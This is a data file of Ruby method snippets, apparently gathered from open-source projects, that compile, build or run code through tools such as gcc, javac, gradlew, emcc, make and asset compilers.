"def run(*args)\n if compile? && !@compiled\n rc = compile\n @compiled = true if rc == 0\n if(rc != 0)\n raise CompileException.new(rc, @compile_out, @compile_err)\n end\n end\n\n execute(args)\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def compile\n raise NotImplementedError\n end",
"def compile()\n self._compiled = <<\"JAVASCRIPT\"\n(function(repl) {\n try {\n var rc;\n #{code.join(' ')}\n repl.rc_ok(rc);\n } catch(e) {\n repl.rc_fail(e.name, e.message ? e.message : e);\n };\n})(#{replid});\nJAVASCRIPT\n self._code = []\n end",
"def compile!\n raise NotImplementedError\n end",
"def compile\n min = [@x.length, @y.length].min\n IO::File.open(@filename, 'w') do |f|\n min.times { |i| f.puts sprintf(\"%e\", @x[i]) + ' ' + sprintf(\"%e\", @y[i]) }\n end\n \"\\\"\" + @filename + \"\\\" \" + compile_options + \";\"\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def run(content, params = {})\n # Add filename to load path\n Uglifier.new(params).compile(content)\n end",
"def compile\n\n if all_files.join().match(/\\.coffee/) and !@has_coffee\n error \"Cannot compile coffeescript\".red\n error \"Add \".white + \"gem 'coffee-script'\".yellow + \" to your Gemfile.\"\n end\n\n if @options[:uglify] and !@uglifier\n error \"Cannot uglify javascript\".red\n error \"Add \".white + \"gem 'uglifier'\".yellow + \" to your Gemfile.\"\n end\n\n begin\n js = Stitch::Package.new(:dependencies => dependencies, :paths => @options[:paths]).compile\n js = @uglifier.compile(js) if @uglifier\n js\n rescue StandardError => e\n error \"Stitch failed to compile\".red\n error e\n false\n end\n end",
"def compileCXX(params)\n\t\tsrc = requireParam(params, :src)\n\t\ttarget = requireParam(params, :target)\n\t\totherOptions = params[:opts] || []\n\t\t\n\t\tprintAndCall(\"#{compileCmd(src)} #{otherOptions.join(' ')} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -o #{target} -c #{src}\")\n\tend",
"def compile\n Timer.new(:title => \"YMDP\").time do\n clean_tmp_dir do\n process_domains\n end\n end\n end",
"def compilation_with_makefile\n # Build the program\n depend_msg = `make depend 2>&1`\n build_msg = `make 2>&1`\n \n @log_file.puts \"\\nConstruction des dépendances :\\n\\n#{depend_msg}\"\n @log_file.puts \"\\nConstruction du programme :\\n\\n#{build_msg}\"\n end",
"def compile(path)\n files = getFilesInDirCompiler(path)\n filesWithLines = getFilesWithLinesCompiler(files)\n classNames = getClassNames(filesWithLines)\n functionInfo = getFunctionNameTypesFiles(filesWithLines)\n compilerInfo = [classNames, functionInfo]\n\n for i in 0..filesWithLines.size-1\n fSize = filesWithLines[i][0].size\n\n #renaming the\n compiledFileName = filesWithLines[i][0][0, fSize-5]+\".vm\"\n compiledFileXMLName = filesWithLines[i][0][0, fSize-5]+\"Out.xml\"\n tokensFileName = filesWithLines[i][0][0, fSize-5]+\"TOut.xml\"\n lines = filesWithLines[i][1]\n lines = getLines(lines)\n tokens = tokenize(lines)\n\n writeCompiledFile(tokens, compilerInfo, compiledFileName)\n writeCompiledXMLFile(tokens, classNames, compiledFileXMLName)\n writeTokensXMLFile(tokens, tokensFileName)\n puts filesWithLines[i][0] + \" was tokenized and compiled\" +\"\\n\"\n end\nend",
"def compile\n compile_body\n compile_head\n \n builder = ScriptBuilder.new @template\n builder.build_for_page @filename\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def compile_to_c\n statements.collect { |s| s.compile_to_c }.join(\"\\n\")\n end",
"def compile\n puts BUILDPACK_MESSAGE % @buildpack_version\n\n container = component_detection('container', @containers, true).first\n no_container unless container\n\n component_detection('JRE', @jres, true).first.compile\n component_detection('framework', @frameworks, false).each(&:compile)\n\n container.compile\n\n log_cache_contents\n\n return if @deps_dir.nil? || @index.nil?\n\n FileUtils.mkdir_p File.join(@deps_dir, @index)\n File.write(\n File.join(@deps_dir, @index, 'config.yml'),\n { 'name' => 'java', 'config' => {}, 'version' => @buildpack_version.to_s(false) }.to_yaml\n )\n end",
"def compile_to_ruby\n \"\"\n end",
"def compile\n read_yml if File.exists?(@project)\n\n default_options = {}\n other_options = {}\n\n @compile_options.each do |k,v| \n if /default/.match(k)\n default_options[k] = v\n else\n other_options[k] = v\n end\n end\n\n command = \"#{@flex_sdk_bin}#{@compiler}\"\n other_options.each { |k,v| command += \" -#{k}=\\\"#{[v].flatten.join ','}\\\"\" }\n default_options.each { |k,v| command += \" -#{k}=\\\"#{[v].flatten.join ','}\\\"\" }\n command += \" #{@document_class}.as\"\n\n# puts command\n# TextMate.exit_show_html\n\n @command = command\n#TextMate.exit_show_html\n if process_output command\n# load_debugger\n display_web_player #unless ARGV[0] = \"--display\"\n# display_player\n end\nend",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def generate_c_source( dir, filename = self.name + '.c' )\r\n # TODO\r\n puts \"generating \" + dir + '/' + filename\r\n end",
"def run(files)\n files = files.reject { |file| file.end_with? '.h' }\n filenames = files.map { |file| File.basename(file) }\n puts \"Compiling #{filenames * ' '}...\"\n Dir.mktmpdir('rucppy') do |dir|\n compile_command = \"g++ -std=c++11 #{files * ' '} -o #{dir}/a.out\"\n # puts compile_command\n `#{compile_command}`\n system(\"#{dir}/a.out\")\n end\nend",
"def _dump(level)\n compile\n end",
"def compile(script, filename=nil, linenum=nil)\n delegate.compile(script, filename, linenum)\n end",
"def compile_program(program)\n @compile_counter = 0\n program.each_line do |line| \n self.compile_line(line) \n end\n end",
"def onCompile\n end",
"def compile(file_or_dir, options = {})\n options = {\n check_for_changes: true,\n sub_template: false,\n collect_stats: true,\n ignore_blank_lines: true\n }.merge(options)\n @scope = options[:scope]\n # Doing here so the output_directory (requiring target load) doesn't get hit if\n # it is already defined\n options[:output_directory] ||= output_directory\n @check_for_changes = options[:check_for_changes]\n @options = options\n if options[:sub_template]\n block = options.delete(:block)\n if is_erb?(file_or_dir)\n run_erb(file_or_dir, options, &block)\n else\n f = File.open(file_or_dir)\n content = f.read\n f.close\n insert(content)\n end\n else\n Origen.file_handler.resolve_files(file_or_dir, ignore_with_prefix: '_', import: :template) do |file|\n compile_file(file, options)\n end\n end\n end",
"def call(env)\n compile!\n call!(env)\n end",
"def compile\n if @app_dir.nil?\n raise 'app directory must be provided'\n elsif @version.nil? || @uri.nil? || @nosetup_zip.nil?\n raise \"Version #{@version}, uri #{@uri}, or new jrebel-nosetup.zip #{@nosetup_zip} is not available, detect needs to be invoked\"\n end\n\n jr_home = File.join(@app_dir, JR_HOME_DIR)\n FileUtils.mkdir_p(jr_home)\n FileUtils.rm_r(File.join(jr_home, JREBEL)) if Dir.exist?(File.join(jr_home, JREBEL))\n download_and_install_agent(jr_home)\n end",
"def write\n Logger.info \"Writing code to files\"\n prepare_working_dir\n process_other_source_files\n\n # Create the code\n writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter\n writer_class.new(@builder, @working_dir).write\n\n # Create the extconf.rb\n extconf = Writers::ExtensionWriter.new(@builder, @working_dir)\n extconf.options = @options\n extconf.write\n Logger.info \"Files written\"\n end",
"def compile(spec)\n handle_exceptions {\n @oneline = spec.index(\"\\n\").nil?\n @spec = spec.sub(/^\\s*\\n/, \"\")\n @file = find_caller_file\n @tokens = Lexer.lex(name, @spec, @oneline)\n ast = Parser.parse(tokens)\n\n help_spec = (@help == true ? \"-h,help\" : @help)\n version_spec = (@version == true ? \"--version\" : @version)\n quiet_spec = (@quiet == true ? \"-q,quiet\" : @quiet)\n verbose_spec = (@verbose == true ? \"+v,verbose\" : @verbose)\n debug_spec = (@debug == true ? \"--debug\" : @debug)\n\n @quiet_option = \n ast.inject_option(quiet_spec, \"Quiet\", \"Do not write anything to standard output\") if @quiet\n @verbose_option = \n ast.inject_option(verbose_spec, \"Increase verbosity\", \"Write verbose output\") if @verbose\n @debug_option = \n ast.inject_option(debug_spec, \"Write debug information\") if @debug\n @help_option = \n ast.inject_option(help_spec, \"Write short or long help\") { |option|\n short_option = option.short_names.first \n long_option = option.long_names.first\n [\n short_option && \"#{short_option} prints a brief help text\",\n long_option && \"#{long_option} prints a longer man-style description of the command\"\n ].compact.join(\", \")\n } if @help\n @version_option = \n ast.inject_option(version_spec, \"Write version number and exit\") if @version\n\n @grammar = Analyzer.analyze(ast)\n }\n self\n end",
"def compile_ruby\n if $DEBUG\n puts \"user_home: #{user_home}\"\n puts \"user_local: #{user_local}\"\n puts \"make_command: #{make_command}\"\n puts \"version: #{version}\"\n puts \"ruby_cc_version: #{ruby_cc_version}\"\n puts \"ruby_source: #{ruby_source}\"\n puts \"srcdir: #{srcdir}\"\n puts \"blddir: #{blddir}\"\n puts \"libdir: #{libdir}\"\n end\n\n mingw32\n environment\n download_source\n extract_source\n makefile_in_bak # create Makefile.in.bak\n makefile_in # create Makefile.in\n configure # create Makefile\n make # creates ruby.exe\n make_install\n update_config\n end",
"def run\n start = Time.now\n log \"[0/3] Generating build\"\n generate_build\n\n log \"[1/3] Building\"\n filename = build\n\n log \"[2/3] Parsing\"\n\n @config[:parser].parse(filename)\n log \"[3/3] Complete\"\n\n Time.now - start\n end",
"def compile obj, src\n sh \"gcc #{$C_FLAGS.join ' '} -c #{src} -o #{obj}\"\nend",
"def compileFortran(params)\n\t\tsrc = requireParam(params, :src)\n\t\ttarget = requireParam(params, :target)\n\t\totherOptions = params[:opts] || []\n\t\t\n\t\tprintAndCall(\"#{compileCmd(src)} #{otherOptions.join(' ')} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -o #{target} -c #{src}\")\n\tend",
"def setup_java_extension(extension_name, gem_spec = nil, opts = {})\n ext_name = \"#{extension_name}.jar\"\n directory 'lib'\n opts = {\n :source_dir => 'ext-java/src/main/java',\n :add_buildr_task => true\n }.merge!(opts)\n\n desc 'Compile Extension for current Ruby (= compile:jruby)'\n task :compile => [ 'compile:jruby' ] if JRUBY\n\n namespace :compile do\n\n desc \"Compile Java Extension for JRuby\"\n task :jruby => [ :clean ] do\n pkg_classes = File.join(*%w(pkg classes))\n mkdir_p pkg_classes\n\n if extension_name == 'do_jdbc_internal'\n classpath_arg = java_classpath_arg\n else\n unless File.exists?('../do_jdbc/lib/do_jdbc_internal.jar')\n # Check for the presence of do_jdbc_internal.jar in the do_jdbc project\n # which we need to compile against.\n print \"\\n\"; 80.times { print '-' }; print \"\\n\"\n puts \"To compile the Java extension, #{extension_name}, you will first need to compile\"\n puts \"common JDBC support for DataObjects, do_jdbc:\"\n puts \"cd ../do_jdbc; jruby -S rake compile\"\n 80.times { print '-' }; print \"\\n\\n\"\n\n raise \"Required file for compilation (do_jdbc_internal.jar) not found.\"\n end\n\n classpath_arg = java_classpath_arg '../do_jdbc/lib/do_jdbc_internal.jar'\n end\n\n # just use the extension directory from the executing java\n # for compilation as well\n extdir = java.lang.System.getProperty('java.ext.dirs')\n extdir_arg = extdir.nil? ? \"\" : \"-extdirs #{extdir}\"\n\n # Check if DO_JAVA_DEBUG env var was set to TRUE\n # TRUE means compile java classes with debug info\n if ENV['DO_JAVA_DEBUG'] && ENV['DO_JAVA_DEBUG'].upcase.eql?(\"TRUE\")\n sh \"javac #{extdir_arg} -target 1.5 -source 1.5 -Xlint:unchecked -g -d pkg/classes #{classpath_arg} #{FileList[\"#{opts[:source_dir]}/**/*.java\"].join(' ')}\"\n else\n sh \"javac #{extdir_arg} -target 1.5 -source 1.5 -Xlint:unchecked -d pkg/classes #{classpath_arg} #{FileList[\"#{opts[:source_dir]}/**/*.java\"].join(' ')}\"\n end\n\n sh \"jar cf lib/#{ext_name} -C #{pkg_classes} .\"\n end\n\n if opts[:add_buildr_task]\n desc \"Compile Java Extension for JRuby (with buildr)\"\n task :jruby_buildr do\n begin\n # gem 'buildr', '~>1.3'\n # FIXME: this is throwing RSpec activation errors, as buildr relies on\n # an older version of Rake.\n\n sh %{#{RUBY} -S buildr package}\n\n buildr_output = extension_name.gsub(/_(ext)$/, '-\\1-java-1.0.jar')\n cp \"ext-java/target/#{buildr_output}\", \"lib/#{ext_name}\"\n rescue LoadError\n puts \"#{spec.name} requires the buildr gem to compile the Java extension\"\n end\n end\n end\n\n end\n file \"lib/#{ext_name}\" => 'compile:jruby'\n\nend",
"def compile\n @version, @uri = Ruby.find_ruby(@configuration)\n\n download_start_time = Time.now\n if @uri.include? '://'\n print \"-----> Downloading #{@version} ruby from #{@uri} ... \"\n else\n filename = File.basename(@uri)\n print \"-----> Retrieving #{@version} ruby (#{filename}) ... \"\n end\n LibertyBuildpack::Util::Cache::ApplicationCache.new.get(@uri) do |file| # TODO: Use global cache\n puts \"(#{(Time.now - download_start_time).duration})\"\n expand file\n end\n end",
"def compile_assets\n boot_rails\n run_compiler\n \n !failed?\n end",
"def compile_assets\n boot_rails\n run_compiler\n \n !failed?\n end",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile\n Tipsy::Runners::Compiler.new(@args, @site)\n end",
"def compile(build_folder, check: false, write: false, release: false, verbose: false, use_cache: true)\n @file_resolver = FileResolver.new(Config.instance.project_path, build_folder)\n compilation_context.file_resolver = @file_resolver\n compilation_context.should_check = check\n compilation_context.should_write = write\n compilation_context.release_build = release\n compilation_context.verbose = verbose\n compilation_context.use_cache = use_cache\n\n self.class.globals_tracker.catch do\n @build_folder = build_folder\n\n FileUtils.mkdir_p(build_folder)\n\n puts \" handling target #{@target.name.inspect} in build dir `#{Config.instance.pretty_path_from_project(build_folder)}`\"\n\n file_resolver.add_file(FileTypes::SourceFile.new(Config.instance.pretty_path_from_project(@book.file_path).to_s))\n compilation_context.plugins\n\n parse_toc_item(@target.root_toc)\n parse_target_file_requests\n\n process_all_target_files\n generate_other_files\n\n # build folder cleanup\n remove_unnecessary_files\n remove_empty_folders\n\n source_paths = file_resolver.files.select { |a| a.is_a?(FileTypes::SourceFile) }.map { |a| a.source_path }\n compilation_context.source_file_database.cleanup(source_paths)\n compilation_context.source_file_database.update_all_metadata\n compilation_context.source_file_database.save_to_file\n\n compilation_context.target_file_database.cleanup(source_paths)\n compilation_context.target_file_database.update_all_metadata\n compilation_context.target_file_database.save_to_file\n end\n ensure\n self.class.globals_tracker.clear_all\n end",
"def compile_to_ruby\n statements.collect { |s| s.compile_to_ruby }.join(\"\\n\")\n end",
"def compile_file(path)\n path = \"#{path}.rb\" unless path =~ /\\.rb\\Z/\n res = RubyVM::InstructionSequence.compile_file(path)\n data = Marshal.dump(res.to_a)\n rbc_path = path + \"c\"\n File.open(rbc_path, \"w+\") {|f| f.write data }\n rescue NotImplementedError\n # Ruby bug with terminated objects\n false\n end",
"def compile(*args)\n\t filtered_args, vm = prepare_call(args)\n\t CompiledCall.new(self, filtered_args, vm)\n\tend",
"def do_compile_command(name, file)\n output, result = compile_file(name)\n output = clean_debug(output)\n if (output != \"\" || result != 0)\n puts \"----------------------------------------------------------------------\"\n puts \"BUG: %s failed to compile\" % name\n puts \"----------------------------------------------------------------------\"\n puts output\n puts \"----------------------------------------------------------------------\"\n exit 1\n end\nend",
"def build\n so_name = self.so_name\n so_exists = File.file? so_name\n unless so_exists and File.mtime(rb_file) < File.mtime(so_name) then\n\n unless File.directory? Inline.directory then\n warn \"NOTE: creating #{Inline.directory} for RubyInline\" if $DEBUG\n Dir.mkdir Inline.directory, 0700\n end\n\n src_name = \"#{Inline.directory}/#{module_name}.c\"\n old_src_name = \"#{src_name}.old\"\n should_compare = File.write_with_backup(src_name) do |io|\n if @include_ruby_first\n @inc.unshift \"#include \\\"ruby.h\\\"\"\n else\n @inc.push \"#include \\\"ruby.h\\\"\"\n end\n\n io.puts\n io.puts @inc.join(\"\\n\")\n io.puts\n io.puts @src.join(\"\\n\\n\")\n io.puts\n io.puts\n io.puts \"#ifdef __cplusplus\"\n io.puts \"extern \\\"C\\\" {\"\n io.puts \"#endif\"\n io.puts \" __declspec(dllexport)\" if WINDOZE\n io.puts \" void Init_#{module_name}() {\"\n io.puts \" VALUE c = rb_cObject;\"\n\n # TODO: use rb_class2path\n # io.puts \" VALUE c = rb_path2class(#{@mod.name.inspect});\"\n io.puts @mod.name.split(\"::\").map { |n|\n \" c = rb_const_get(c,rb_intern(\\\"#{n}\\\"));\"\n }.join(\"\\n\")\n\n @sig.keys.sort.each do |name|\n arity, singleton, method_name = @sig[name]\n if singleton then\n io.print \" rb_define_singleton_method(c, \\\"#{method_name}\\\", \"\n else\n io.print \" rb_define_method(c, \\\"#{method_name}\\\", \"\n end\n io.puts \"(VALUE(*)(ANYARGS))#{name}, #{arity});\"\n end\n io.puts @init_extra.join(\"\\n\") unless @init_extra.empty?\n\n io.puts\n io.puts \" }\"\n io.puts \"#ifdef __cplusplus\"\n io.puts \"}\"\n io.puts \"#endif\"\n io.puts\n end\n\n # recompile only if the files are different\n recompile = true\n if so_exists and should_compare and\n FileUtils.compare_file(old_src_name, src_name) then\n recompile = false\n\n # Updates the timestamps on all the generated/compiled files.\n # Prevents us from entering this conditional unless the source\n # file changes again.\n t = Time.now\n File.utime(t, t, src_name, old_src_name, so_name)\n end\n\n if recompile then\n\n hdrdir = %w(srcdir archdir rubyhdrdir).map { |name|\n Config::CONFIG[name]\n }.find { |dir|\n dir and File.exist? File.join(dir, \"/ruby.h\")\n } or abort \"ERROR: Can't find header dir for ruby. Exiting...\"\n\n flags = @flags.join(' ')\n libs = @libs.join(' ')\n\n config_hdrdir = if RUBY_VERSION > '1.9' then\n \"-I #{File.join hdrdir, RbConfig::CONFIG['arch']}\"\n else\n nil\n end\n\n cmd = [ Config::CONFIG['LDSHARED'],\n flags,\n Config::CONFIG['CCDLFLAGS'],\n Config::CONFIG['CFLAGS'],\n '-I', hdrdir,\n config_hdrdir,\n '-I', Config::CONFIG['includedir'],\n \"-L#{Config::CONFIG['libdir']}\",\n '-o', so_name.inspect,\n File.expand_path(src_name).inspect,\n libs,\n crap_for_windoze ].join(' ')\n\n # TODO: remove after osx 10.5.2\n cmd += ' -flat_namespace -undefined suppress' if\n RUBY_PLATFORM =~ /darwin9\\.[01]/\n cmd += \" 2> #{DEV_NULL}\" if $TESTING and not $DEBUG\n\n warn \"Building #{so_name} with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n bad_src_name = src_name + \".bad\"\n File.rename src_name, bad_src_name\n raise CompilationError, \"error executing #{cmd.inspect}: #{$?}\\nRenamed #{src_name} to #{bad_src_name}\"\n end\n\n # NOTE: manifest embedding is only required when using VC8 ruby\n # build or compiler.\n # Errors from this point should be ignored if Config::CONFIG['arch']\n # (RUBY_PLATFORM) matches 'i386-mswin32_80'\n if WINDOZE and RUBY_PLATFORM =~ /_80$/ then\n Dir.chdir Inline.directory do\n cmd = \"mt /manifest lib.so.manifest /outputresource:so.dll;#2\"\n warn \"Embedding manifest with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n raise CompilationError, \"error executing #{cmd}: #{$?}\"\n end\n end\n end\n\n warn \"Built successfully\" if $DEBUG\n end\n\n else\n warn \"#{so_name} is up to date\" if $DEBUG\n end # unless (file is out of date)\n end",
"def build_core\n code = ''\n\n code += File.read(RUNTIME_PATH)\n code += build_stdlib('core.rb', 'core/*.rb')\n code += \"opal.require('core');\"\n\n code\n end",
"def compile(compilable)\r\n compiler = File.expand_path @compiler_exe, @compiler_path\r\n result = []\r\n \r\n compilable.compiler_target_files.each do |target_file|\r\n # Construct paths.\r\n include_paths = \"-I#{compilable.compiler_include_paths.join ';'}\" unless\r\n compilable.compiler_include_paths.empty?\r\n \r\n module_paths = \"-M#{compilable.compiler_module_paths.join ';'}\" unless\r\n compilable.compiler_module_paths.empty?\r\n \r\n library_paths = \"-L#{compilable.compiler_library_paths.join ';'}\" unless\r\n compilable.compiler_library_paths.empty?\r\n \r\n # Run the NetLinx compiler.\r\n # Note: NLRC.exe v2.1 freaks out if empty arguments (\"\") are in the command.\r\n cmd = ''\r\n cmd += 'wine ' if @use_wine or compiler.include? '/.wine/'\r\n cmd += \"\\\"#{compiler}\\\" \\\"#{target_file}\\\"\"\r\n cmd += \" \\\"#{include_paths}\\\"\" if include_paths\r\n cmd += \" \\\"#{module_paths}\\\"\" if module_paths\r\n cmd += \" \\\"#{library_paths}\\\"\" if library_paths\r\n \r\n io = IO.popen cmd\r\n stream = io.read\r\n io.close\r\n \r\n # Build the result.\r\n result << NetLinx::CompilerResult.new(\r\n compiler_target_files: [target_file],\r\n compiler_include_paths: compilable.compiler_include_paths,\r\n compiler_module_paths: compilable.compiler_module_paths,\r\n compiler_library_paths: compilable.compiler_library_paths,\r\n stream: stream\r\n )\r\n end\r\n \r\n result\r\n end",
"def compile(filename)\n # First pass - define labels\n elements.each do |codeline|\n codeline.register_labels\n @@position += codeline.size\n end\n\n # Second pass - write to binary file\n File.open(filename, 'wb') do |f|\n elements.each do |codeline|\n f.write codeline.to_bin\n end\n end\n end",
"def setup_c_extension(extension_name, gem_spec = nil)\n # use the DLEXT for the true extension name\n ext_name = \"#{extension_name}.#{RbConfig::CONFIG['DLEXT']}\"\n\n # we need lib\n directory 'lib'\n\n # verify if the extension is in a folder\n ext_dir = File.join('ext', extension_name)\n unless File.directory?(ext_dir)\n # the extension is in the root of ext.\n ext_dir = 'ext'\n end\n\n # getting this file is part of the compile task\n desc \"Compile Extension for current Ruby (= compile:mri)\"\n task :compile => [ 'compile:mri' ] unless JRUBY\n\n namespace :compile do\n desc 'Compile C Extension for Ruby 1.8 (MRI)'\n task :mri => [:clean, \"rake:compile:lib/#{ext_name}\"]\n\n task \"#{ext_dir}/#{ext_name}\" => FileList[\"#{ext_dir}/Makefile\", \"#{ext_dir}/*.c\", \"#{ext_dir}/*.h\"] do\n # Visual C make utility is named 'nmake', MinGW conforms GCC 'make' standard.\n make_cmd = RUBY_PLATFORM =~ /mswin/ ? 'nmake' : 'make'\n Dir.chdir(ext_dir) do\n sh make_cmd\n end\n end\n\n file \"#{ext_dir}/Makefile\" => \"#{ext_dir}/extconf.rb\" do\n Dir.chdir(ext_dir) do\n ruby 'extconf.rb'\n end\n end\n\n task \"lib/#{ext_name}\" => ['lib', \"#{ext_dir}/#{ext_name}\"] do\n cp \"#{ext_dir}/#{ext_name}\", \"lib/#{ext_name}\"\n end\n end\n\n unless Rake::Task.task_defined?('native')\n if gem_spec\n desc \"Build Extensions into native binaries.\"\n task :native => [:compile] do |t|\n # use CURRENT platform instead of RUBY\n gem_spec.platform = Gem::Platform::CURRENT\n\n # clear the extension (to avoid RubyGems firing the build process)\n gem_spec.extensions.clear\n\n # add the precompiled binaries to the list of files\n # (taken from compile task dependency)\n gem_spec.files += Rake::Task['compile'].prerequisites\n end\n end\n end\nend",
"def compile(pattern, options)\n log.header 'Compile'\n each_solution(pattern) do |solution|\n build_manager = BuildManager.new(solution)\n build_manager.build(options[:debug], options[:update_version])\n end\n end",
"def compile\n '(%s = %s; %s %s []; %s; %s.join)' % [\n RESULT_VARIABLE_BACKDOOR,\n @result_variable.inspect,\n\n @result_variable,\n @continue_result ? '||=' : '=',\n\n @source_lines.map do |source_line|\n compiled_line = []\n combine_prev = false\n\n source_line.each do |stmt|\n is_code = stmt.type == :code\n is_expr = stmt.type == :expr\n\n if is_code\n compiled_line << stmt.value\n combine_prev = false\n\n else\n code =\n if is_expr\n \" << (#{stmt.value.strip})\"\n else\n \" << #{stmt.value.inspect}\"\n end\n\n if combine_prev\n compiled_line.last << code\n else\n compiled_line << @result_variable.to_s + code\n end\n\n combine_prev = true\n end\n end\n\n compiled_line.join('; ')\n\n end.join(\"\\n\"),\n\n @result_variable,\n ]\n end",
"def compile(filename)\n check_cookie\n Native::magic_compile(@cookie, filename);\n end",
"def build(rb_file)\n# Clean up the build directory\n FileUtils.rm_rf 'tmp'\n\n # Check if source file provided is good\n if !rb_file\n puts 'Please provide a Ruby file to build'\n exit\n elsif !File.exists? \"/src/#{rb_file}\"\n puts \"Can't find file: #{rb_file}\"\n exit\n end\n\n # Create the build directory\n FileUtils.mkdir_p 'tmp'\n\n # Create MRuby bytecode from Ruby source file\n `mrbc -Bruby_app -otmp/app.c /src/#{rb_file}`\n\n `cat tmp/app.c`\n # Add MRuby init code to app bytecode\n open('tmp/app.c', 'a') do |f|\n f << \"\\n\\n\" << File.read(\"/build/utils/assets/mruby_init.c\")\n end\n\n # Compile using Emscripten\n `emcc -s WASM=1 #{ if @optimize then '-Os' end } -I '/build/mruby/include' tmp/app.c /build/mruby/build/emscripten/lib/libmruby.a -o app.js #{ if @optimize then '--closure 1' end }`\n\n # Clean up\n FileUtils.rm_rf 'tmp'\nend",
"def compilelet\n\n end",
"def generate_compilation\n puts \"Generating compilation\"\n get_selected_vines\n pathArray = [];\n @selected_vines.each do |vid|\n vine = Vine.find(vid)\n pathArray.push vine.path\n end\n if pathArray.count > 0\n return outputFile = execute_ffmpeg(pathArray)\n end\n end",
"def create\n\n # Let's get a few things straight\n @work_dir = \"#{@resource[:cache_dir]}/#{@resource[:extension]}\"\n @php_version_prefix = \"#{@resource[:phpenv_root]}/versions/#{@resource[:php_version]}\"\n @resource[:compiled_name] ||= \"#{@resource[:extension]}.so\"\n\n # Update the repository\n fetch @resource[:version], @resource[:extension]\n\n # Prepare for building\n prep_build @resource[:version]\n\n # PHPize, build & install\n phpize\n configure\n make\n install\n end",
"def compile()\n begin\n\n @config = FILE_IMPORTER.load(@config, true)\n\n Wavy::Parsers::Import.load(@config, @config_root)\n Wavy::Parsers::Import.extract\n\n if @view == false\n exports = Wavy::Models::Exports.get\n exports.each do |key, export|\n rendered = self.class.render(export.path)\n output(rendered['template'], rendered['full_path'], rendered['file_path'])\n end\n else\n rendered = self.class.render(@view)\n output(rendered['template'], rendered['full_path'], rendered['file_path'])\n end\n\n rescue Exception => e\n puts e.message\n end\n end",
"def compile(mod, grammar_or_parser, opts={})\r\n model = parser_model(grammar_or_parser)\r\n mod.module_eval ParserGenerator.code_for(model, opts)\r\n mod\r\n end",
"def compile\n # setup configurations\n configurations\n\n # Download and untar apache2\n apache2 = download_untar @configuration[\"download_url\"]\n\n # download and untar zlib\n zlib = download_untar @configuration[\"zlib_download_url\"]\n\n @logger.debug\"ZlIB Dir Content: #{Dir[File.join(zlib,\"*\")]}\"\n # configure and compile zlib\n zlib_configure_file = File.join(zlib,\"configure\")\n zlib_install_dir = File.join(@application.cache_dir,\"zlib\")\n\n shell_script = File.join(@application.buildpack_dir,\"resources/shell/compile_zlib.sh\");\n fail \"Shell Script failed\" unless 0 == system(\"./#{shell_script}\")\n # @logger.debug(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n # result = system(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n #\n # puts result\n # @logger.debug(\"Configure ZLIB result: #{result[0..-100]}\")\n #\n # # Make zlib\n # @logger.debug(\"make -C #{zlib}\")\n # result = `make -C #{zlib}`\n # puts result\n # @logger.debug(\"Make ZLIB result: #{result[0..-100]}\")\n # @logger.debug(\"make install -C #{zlib}\")\n # result = `make install -C #{zlib}`\n # @logger.debug(\"Make Install Result: #{result[0..-100]}\")\n\n @logger.debug \"Zlib Install Location: #{Dir[File.join(zlib_install_dir,'*')]}\"\n\n end",
"def build!\n test_git!\n\n file_list = Dir.glob(\"#{@source}*\").sort # Pull the file list before creating the target directory\n\n setup_target\n\n add_runner\n\n file_list.each do |infile_name|\n rewrite_animation_frame infile_name\n create_commit infile_name\n end\n end",
"def compile\n prep\n client.setup_run_context\n end",
"def compile\n system \"rm -rf #{new_relic_home}\"\n system \"mkdir -p #{new_relic_home}\"\n system \"mkdir -p #{File.join new_relic_home, 'logs'}\"\n\n JavaBuildpack::Util.download(@version, @uri, 'New Relic Agent', jar_name(@version), new_relic_home)\n copy_resources new_relic_home\n end",
"def test_compile(code, stage = :compile)\n log.debug \"Testing compilation of:\\n\" + code\n\n # Write the code to a temporary source file\n f = Tempfile.new(['test_compile', @extension]);\n f.print code\n f.flush\n\n # Run the compiler\n cc = self # KLUDGE, testing\n cc.sources = f.path\n cc.output = f.path.sub(/\\.c$/, Platform.object_extension)\n cc.quiet = ENV['MAKECONF_DEBUG'].nil?\n rc = cc.compile\n\n # (Optional) Run the linker\n if (rc == true and stage == :combined)\n cc.ld.quiet = true\n rc = cc.link\n File.unlink(cc.ld.output) if File.exist? cc.ld.output\n end\n\n # Delete the output file(s)\n File.unlink(cc.output) if File.exist? cc.output\n\n return rc\n end",
